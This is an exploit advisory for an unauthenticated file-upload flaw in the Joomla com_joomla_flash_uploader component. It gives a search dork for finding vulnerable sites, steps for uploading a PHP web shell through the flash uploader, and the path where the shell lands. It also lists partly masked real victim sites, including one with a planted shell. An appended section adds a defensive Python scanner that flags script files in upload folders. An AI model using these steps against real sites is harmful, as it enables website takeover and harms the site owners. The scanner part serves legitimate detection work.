Joomla Component com_joomla_flash_uploader Remote File Upload

2012.09.27
Credit: Zikou-16
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

--------------------------------------------------------------
Joomla Component com_joomla_flash_uploader Remote File Upload
-------------------------------------------------------------
Exploit Author => Zikou-16
My Facebook => http://www.facebook.com/ZIkOou.16
-------------------------------------------------------------
Dork => inurl:index.php?option=com_joomla_flash_uploader
-------------------------------------------------------------

So !! xD

First Go to ==> http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id]

You Will Find a Flash Uploader

Or Go To http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf

You Can Upload Your Shell.php or shell.php.jpg

In The Flash Uploader you'll see Your Shell !!

4 example ==> Upload folder: ./images/stories/
==> Your shell => http://localhost//images/stories/shell.php

Demo ==> http://www.coXXorexcellence.co.uk/index.php?option=com_joomla_flash_uploader&Itemid=98
==> http://www.kazXXXXocations.com.au/index.php?option=com_joomla_flash_uploader&Itemid=123

And Shell ==> http://www.kazuXXXXtions.com.au//images/stories/propertyupload/500.php.jpg

Greets To All Dz Hacker's
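For sites that ran this component, an added example (not part of the original advisory) of a defender-side sweep of the upload folder named above for script files such as `shell.php` or `500.php.jpg`. The function names, the extension list and the sample files are assumptions constructed for illustration; point `scan_uploads` at the real `images/stories` directory when triaging a host.

```python
import os
import tempfile

# Extensions a PHP handler may execute (assumption: adjust to the server's configuration).
PHP_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

def classify(path):
    """Return the reasons an uploaded file looks like a script, or [] if none."""
    reasons = []
    parts = os.path.basename(path).lower().split(".")[1:]
    if parts and parts[-1] in PHP_EXTS:
        reasons.append("php-extension")
    elif any(p in PHP_EXTS for p in parts[:-1]):
        reasons.append("double-extension")  # e.g. 500.php.jpg
    with open(path, "rb") as fh:
        head = fh.read(65536).lower()
    if b"<?php" in head:
        reasons.append("php-code-in-content")
    return reasons

def scan_uploads(root):
    """Walk an upload directory; map relative path -> reasons for each flagged file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = classify(full)
            if reasons:
                findings[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample data standing in for ./images/stories/."""
    os.makedirs(os.path.join(root, "propertyupload"))
    samples = {
        "logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "shell.php": b"<?php echo 'constructed sample'; ?>",
        "propertyupload/500.php.jpg": b"\xff\xd8\xff\xe0<?php /* constructed */ ?>",
        "report.v2.png": b"\x89PNG\r\n\x1a\n",
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, why in sorted(scan_uploads(tmp).items()):
            print(rel, why)
```

A flagged file is a lead for review rather than proof of compromise; an upload directory should in any case be served with script execution disabled.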

References:

http://www.facebook.com/ZIkOou.16

